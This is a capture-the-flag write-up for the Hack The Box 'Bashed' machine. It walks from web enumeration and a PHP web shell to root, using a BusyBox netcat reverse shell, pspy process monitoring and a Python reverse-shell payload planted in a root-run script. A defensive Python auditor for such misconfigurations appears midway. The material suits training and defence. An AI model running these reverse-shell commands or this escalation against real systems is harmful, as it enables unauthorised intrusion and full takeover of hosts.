Explore the fundamentals of cybersecurity in the Bashed Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.68 bashed.htb

Script to add hosts automatically

ip="10.10.10.68"
domain="bashed.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV bashed.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 22:23 CEST
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.051s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Directory Discovery

Start by using dirb to scan for directories on Bashed HTB:

dirb http://bashed.htb/

The scan reveals the following directories:

==> DIRECTORY: http://bashed.htb/css/
==> DIRECTORY: http://bashed.htb/dev/
==> DIRECTORY: http://bashed.htb/fonts/
==> DIRECTORY: http://bashed.htb/images/
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/

Getting a Shell

1. Discover the PHP Bash Web Shell

2. Retrieve the User Flag

  • Once inside the PHP Bash web shell, retrieve the arrexel user flag:
cat /home/arrexel/user.txt

3. Check Sudo Privileges

  • After gaining access, check the sudo privileges for the current user:
sudo -l
  • The output reveals:
(scriptmanager : scriptmanager) NOPASSWD: ALL

This means you can execute any command as the scriptmanager user without a password.

4. Find Readable Directories for scriptmanager

  • Locate directories owned by the scriptmanager user by running:
find / -type d -readable -user scriptmanager | grep -v '^/proc\|^/run\|^/sys'

This command lists directories owned by scriptmanager that the current user can read, excluding the pseudo-filesystems /proc, /run, and /sys.

5. Set Up a Reverse Shell Listener

  • On your attacking machine, set up a listener to catch the reverse shell:
nc -lvnp 9001

6. Initiate a Reverse Shell Using BusyBox

  • Since the available nc (netcat) version on the target system is netcat-openbsd, which lacks the -e option, you can use BusyBox to achieve a reverse shell. On the target machine, execute:
busybox nc 10.10.14.9 9001 -e /bin/bash

This command establishes a reverse shell connection to your listener on port 9001.

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm

Monitor Processes with pspy

Objective: Use pspy to monitor processes without needing root privileges and identify processes being executed by root that may be exploitable.

Step 1: Download pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

Step 2: Transfer pspy to the Target Server Using Python HTTP Server

  • On your attacking machine, start a Python HTTP server in the directory where pspy64 is located:
python3 -m http.server 8080
  • On the target machine, download pspy64 using wget:
wget http://<vpn-ip>:8080/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64

Step 3: Run pspy to Monitor Processes

  • Now that pspy64 is on the target machine, run it to monitor running processes:
/tmp/pspy64
  • While monitoring, pspy may show processes that are periodically executed by root. For example:
2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py
  • This shows that test.py is executed by root, which could be exploited by modifying the script.
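The pspy line above is exactly the pattern a defender wants to catch: a script run as UID 0 that is owned by (and writable for) a less privileged account. As an added example, not part of the original writeup or of pspy itself, the following Python script parses pspy `CMD:` lines, resolves the script argument of interpreter invocations, and flags any root-executed script that is owned by a non-root user or is group/world-writable. The sample pspy lines, the file-ownership table and the uid 1001 are constructed for the demo (the box's real uid is not given on the page); the `cwd` argument is an assumption taken from the fact that `test.py` lives in `/scripts`, since pspy does not print the working directory. On a live host, pass `real_stat` instead of `sample_stat` to check the actual filesystem.

```python
import os
import re
import stat
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

# pspy prints one line per spawned process:
# "<yyyy/mm/dd> <hh:mm:ss> CMD: UID=<uid> PID=<pid> | <command line>"
PSPY_LINE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\| (?P<cmd>.+)$"
)

# Interpreters whose first non-option argument is a script worth inspecting.
INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "php"}


@dataclass
class Finding:
    ts: str
    pid: int
    script: str
    reason: str


def parse_pspy_line(line: str) -> Optional[Tuple[str, int, int, str]]:
    """Return (timestamp, uid, pid, command) or None if the line is not a CMD record."""
    m = PSPY_LINE.match(line.strip())
    if not m:
        return None
    return m.group("ts"), int(m.group("uid")), int(m.group("pid")), m.group("cmd")


def script_from_command(cmd: str, cwd: str = "/") -> Optional[str]:
    """Pick the script argument out of an interpreter invocation; relative paths resolve against cwd."""
    argv = cmd.split()
    if not argv or os.path.basename(argv[0]) not in INTERPRETERS:
        return None
    for arg in argv[1:]:
        if not arg.startswith("-"):
            return arg if os.path.isabs(arg) else os.path.normpath(os.path.join(cwd, arg))
    return None


def classify(uid: int, owner_uid: int, mode: int) -> Optional[str]:
    """Explain why a root-executed script is risky, or None if ownership and mode look sane."""
    if uid != 0:
        return None  # not running as root: no privilege boundary is crossed
    if owner_uid != 0:
        return f"executed as root but owned by uid {owner_uid}"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "executed as root but group- or world-writable"
    return None


def audit(lines: List[str], stat_fn: Callable[[str], Tuple[int, int]], cwd: str = "/") -> List[Finding]:
    """Run every pspy line through the checks. stat_fn(path) -> (owner_uid, mode)."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_pspy_line(line)
        if rec is None:
            continue
        ts, uid, pid, cmd = rec
        script = script_from_command(cmd, cwd)
        if script is None:
            continue
        try:
            owner, mode = stat_fn(script)
        except FileNotFoundError:
            continue  # script path could not be resolved; nothing to judge
        reason = classify(uid, owner, mode)
        if reason:
            findings.append(Finding(ts, pid, script, reason))
    return findings


def real_stat(path: str) -> Tuple[int, int]:
    """Adapter for a live host: look the file up with os.stat."""
    st = os.stat(path)
    return st.st_uid, st.st_mode


# Constructed sample data (not captured from the box): the pspy line from the
# writeup plus a root-owned backup script and a non-root job, for contrast.
SAMPLE_LINES = [
    "2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py",
    "2024/09/27 14:02:01 CMD: UID=0     PID=1250   | python3 -u /usr/lib/backup.py",
    "2024/09/27 14:02:01 CMD: UID=1001  PID=1251   | python /home/arrexel/notes.py",
]
SAMPLE_FS = {
    "/scripts/test.py": (1001, 0o100644),  # owned by a non-root user (constructed uid 1001)
    "/usr/lib/backup.py": (0, 0o100755),   # root-owned, not writable by group/other: fine
    "/home/arrexel/notes.py": (1001, 0o100644),
}


def sample_stat(path: str) -> Tuple[int, int]:
    """Stand-in for os.stat backed by the constructed table above."""
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    return SAMPLE_FS[path]


if __name__ == "__main__":
    for f in audit(SAMPLE_LINES, sample_stat, cwd="/scripts"):
        print(f"{f.ts} pid={f.pid} {f.script}: {f.reason}")
```

Only the first sample line produces a finding: root runs `/scripts/test.py`, which is owned by another user. The fix on the defending side is the mirror image of the writeup's escalation: root-invoked scripts (and the directories holding them) should be root-owned and not writable by the accounts that sudo rules such as `NOPASSWD: ALL` hand out.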

1. Switch to scriptmanager User

  • Because test.py is owned by scriptmanager, switch to that user:
sudo -u scriptmanager bash

2. Edit test.py

  • Navigate to the location of test.py, which was identified by pspy, and edit the script to include a Python reverse shell payload:
nano /scripts/test.py
  • Replace the contents of test.py with the following reverse shell code:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

import socket, os, pty
s = socket.socket(); s.connect(("<vpn-ip>", 9002))
for fd in (0, 1, 2): os.dup2(s.fileno(), fd)
pty.spawn("/bin/bash")

3. Set up a Listener

  • On your local machine (the attacker machine), set up a listener to capture the reverse shell:
nc -lvnp 9002

4. Wait for Execution

  • The test.py script is executed periodically by root, as observed in pspy. Wait for the next execution, and the reverse shell should connect to your listener.

5. Capture Root Access

  • Once the reverse shell connects, you should have a shell as root. You can verify this by checking the user and reading sensitive files:
cat /root/root.txt